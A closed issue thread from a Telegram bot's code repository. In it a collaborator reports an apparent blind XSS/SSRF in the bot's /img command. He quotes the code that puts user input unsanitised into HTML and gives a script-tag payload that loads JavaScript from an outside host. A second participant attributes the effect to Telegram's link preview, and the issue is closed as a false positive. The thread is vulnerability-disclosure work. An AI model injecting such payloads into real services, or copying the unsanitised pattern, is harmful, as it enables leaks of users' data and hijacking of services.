HonusBot
/
HonusBot
2
2
Fork 1
Code Issues Pull Requests Releases Wiki Activity

Fix input handling for security purpose. #2

New Issue
Closed
opened 2020-03-29 23:26:29 +02:00 by h0nus · 3 comments
h0nus commented 2020-03-29 23:26:29 +02:00
Collaborator
Copy Link

Due to poor input sanitization, the call /img into bot is vulnerable to Blind XSS/SSRF

Vulnerable code:

if command.getMode() == "imageurl":
			contentText = InputTextMessageContent("<a href=\"" + qValue + "\">HonusBot</a>", "HTML")
		elif command.getMode() == "genericurl":
			contentText = InputTextMessageContent("<a href=\"" + qValue + "\">link</a>", "HTML")
		else:
			contentText = InputTextMessageContent("Error", "HTML")

qValue is inserted without sanitization into the HTML content, making it vulnerable to XSS/Blind XSS.

Poc part 1: /img "><script type="text/javascript" src="https://asdafasdas.free.beeceptor.com/first.js"></script><"

Poc part 2:
Screen 1, request to first.js

image

Screen 2, Headers leaked and also IP address could be leaked.

image

Poc part 3 - theoretically:
Since it's possible to abuse the function to inject Javscript/HTML, an attacker could do SSRF and use the bot as proxy or even read local files and send content to external host.

Due to poor input sanitization, the call /img into bot is vulnerable to Blind XSS/SSRF Vulnerable code: ``` if command.getMode() == "imageurl": contentText = InputTextMessageContent("<a href=\"" + qValue + "\">HonusBot</a>", "HTML") elif command.getMode() == "genericurl": contentText = InputTextMessageContent("<a href=\"" + qValue + "\">link</a>", "HTML") else: contentText = InputTextMessageContent("Error", "HTML") ``` qValue is inserted without sanitization into the HTML content, making it vulnerable to XSS/Blind XSS. Poc part 1: `/img "><script type="text/javascript" src="https://asdafasdas.free.beeceptor.com/first.js"></script><"` Poc part 2: Screen 1, request to first.js ![image](/attachments/220f6f23-79fa-4771-b0be-6bf14cf54824) Screen 2, Headers leaked and also IP address could be leaked. ![image](/attachments/81c7e867-71ee-4743-a3f8-932d7bb65a9b) Poc part 3 - theoretically: Since it's possible to abuse the function to inject Javscript/HTML, an attacker could do SSRF and use the bot as proxy or even read local files and send content to external host.
image.png
24 KiB
image.png
22 KiB
h0nus commented 2020-03-29 23:28:01 +02:00
Author
Collaborator
Copy Link

Poc part 4 - IP Leak thanks to SSRF throught Javascript Injection.

image

Poc part 4 - IP Leak thanks to SSRF throught Javascript Injection. ![image](/attachments/7d43b864-4830-4e3c-b30e-523e53bd174d)
image.png
6.7 KiB
👎 1
davtur19 commented 2020-03-30 03:44:49 +02:00
Copy Link

è la preview di telegram cretina

è la preview di telegram cretina
😆 1
h0nus commented 2020-03-30 03:45:40 +02:00
Author
Collaborator
Copy Link

Closing as false positive after some discussion with developers.

Closing as false positive after some discussion with developers.
h0nus closed this issue 2020-03-30 03:45:40 +02:00
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
master
Labels
Clear labels
No items
No Label
Milestone
Clear milestone
No items
No Milestone
Assignees
Clear assignees
No Assignees
2 Participants
Notifications
Due Date
The due date is invalid or out of range. Please use the format 'yyyy-mm-dd'.

No due date set.

Dependencies

No dependencies set.

Reference: HonusBot/HonusBot#2
No description provided.
Delete Branch "%!s(<nil>)"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?